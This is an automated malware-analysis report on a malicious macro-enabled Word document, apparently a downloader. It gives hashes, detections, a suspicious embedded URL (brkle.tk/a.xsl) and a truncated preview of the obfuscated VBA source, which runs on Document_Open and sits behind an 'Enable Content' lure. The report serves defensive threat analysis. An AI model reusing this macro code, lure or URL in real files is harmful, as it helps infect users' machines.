Office (OOXML) malware analysis — malicious · 8a0dd33d5e4e7655

MALICIOUS

Office (OOXML)

106.2 KB Created: 2021-09-29 22:23:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-10-12

MD5: 859124464ad88dd7526a0f57cde76d2d SHA-1: d051f421a685361fbfde3ddb8d94239326fc868b SHA-256: 8a0dd33d5e4e76558593a9f7df68f4d2ab672371b3c056ffe2a7d3532b5d2105

330 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros, specifically triggering Auto_Open and Document_Open events. The document body explicitly prompts the user to 'Enable Content' for compatibility, a common social engineering tactic. The VBA script appears to check for the existence of .txt files in the AppData directory and potentially proceeds with further malicious actions, likely downloading and executing a second-stage payload.

Heuristics 9

ClamAV: Doc.Downloader.Shellhide-10014935-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Shellhide-10014935-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://brkle.tk/a.xsl In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	16278 bytes
SHA-256: `b370c3c95f5b526c9b39e0cec2dd56e9f5adfbe8d609ef11fba914eff766f549`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Dim bSaved As Boolean Sub Auto_Open() End Sub Sub Document_Open() Call fkeSzYxLrhuhRVGJiwLwclRuspXnlHOkQQLvdcrjtqRkljfeKddNqdpozjZuwoUXQTwyaJjHdtqbrQiCiKdMYCURXR Call iMZhgBKouwiXWuJfNJrPlTeEoJuEzwqyPBCPQEIBAFXCgDJNjOTIHLZnRjcQHbIYKrywncYhINIWBCdppvoJFcEBiv If Len(Dir(Environ("AppData") + "\*.txt")) = 0 Then RuIXdbXbZrJsLewgrkgkIVJlqRVKVZvwCjPAVVDFYJsmnbu Else End If End Sub Sub fkeSzYxLrhuhRVGJiwLwclRuspXnlHOkQQLvdcrjtqRkljfeKddNqdpozjZuwoUXQTwyaJjHdtqbrQiCiKdMYCURXR() Dim rMuPCvUeYbzWcTGSAJfyQegypxAsPyzBljKGrAxQrjVDlWnkVpKMXaKMGvQ As String, XsinaEJSOxrwGdNlmgQAVikPuZ As String Dim MqcLQkajnWyncygEwxmlvnugETdDhGRbCUMtLTIPpgapdGoLLvUlbmIzLPJtYgVWZqYtuuG As Range, SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo As Range Dim voXvGkYUJt As Range, GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib As Range, KBFXvyAmJHAbTMMVeMOOnfxWtYtRRuDvxPUdSuekIQCJHXZDApHGdlP As Range 'Setting up the Ranges Set MqcLQkajnWyncygEwxmlvnugETdDhGRbCUMtLTIPpgapdGoLLvUlbmIzLPJtYgVWZqYtuuG = ActiveDocument.Range Set SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo = ActiveDocument.Range Set voXvGkYUJt = ActiveDocument.Range ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True ActiveDocument.Background.Fill.ForeColor.RGB = RGB(225, 225, 225) ActiveDocument.Background.Fill.Transparency = 0# 'Set your Start and End Find words here to cleanup the script rMuPCvUeYbzWcTGSAJfyQegypxAsPyzBljKGrAxQrjVDlWnkVpKMXaKMGvQ = "This Document Is" XsinaEJSOxrwGdNlmgQAVikPuZ = "Version." 'Starting the Find First Word With MqcLQkajnWyncygEwxmlvnugETdDhGRbCUMtLTIPpgapdGoLLvUlbmIzLPJtYgVWZqYtuuG.Find .Text = rMuPCvUeYbzWcTGSAJfyQegypxAsPyzBljKGrAxQrjVDlWnkVpKMXaKMGvQ .Replacement.Text = "" .Forward = True .Wrap = wdFindAsk .Format = True .MatchCase = False .MatchWholeWord = False .MatchWildcards = False .MatchSoundsLike = False .MatchAllWordForms = False 'Execute the Find Do While .Execute 'If Found then do extra script If .Found = True Then 'Setting the Found range to the GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib Set GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib = MqcLQkajnWyncygEwxmlvnugETdDhGRbCUMtLTIPpgapdGoLLvUlbmIzLPJtYgVWZqYtuuG 'Having these Selections during testing is benificial to test your script GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib.Select 'Setting the SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo up for the remainder of the document form the end of the rMuPCvUeYbzWcTGSAJfyQegypxAsPyzBljKGrAxQrjVDlWnkVpKMXaKMGvQ SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo.Start = GfqdEWWQCHtDtXsaiNNWiHxOXTeECFctzEtNwlxHZqIFfoLYnxgYZbRoyVib.End SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo.End = ActiveDocument.Content.End 'Having these Selections during testing is benificial to test your script SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo.Select 'Setting the Find to look for the End Word With SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo.Find .Text = XsinaEJSOxrwGdNlmgQAVikPuZ .Execute 'If Found then do extra script If .Found = True Then 'Setting the Found range to the KBFXvyAmJHAbTMMVeMOOnfxWtYtRRuDvxPUdSuekIQCJHXZDApHGdlP Set KBFXvyAmJHAbTMMVeMOOnfxWtYtRRuDvxPUdSuekIQCJHXZDApHGdlP = SzCrtxZGklYuUudTGEpMLEDzFUubZZaHjnNvaeevieVqBsoHtyNddgTnHoXBHfSxkBmmOMrkUDckiEeWHyYwolRYmyBdZo 'Having these Selections during testing is benificial to test your script KBFXvyAmJHAb ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	151552 bytes
SHA-256: `46680dba1e04870aa832c6a4e2eb2ce0c6b9ab2b22634848f5a39fb9901117c3`
Detection ClamAV: Doc.Downloader.Shellhide-10014935-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.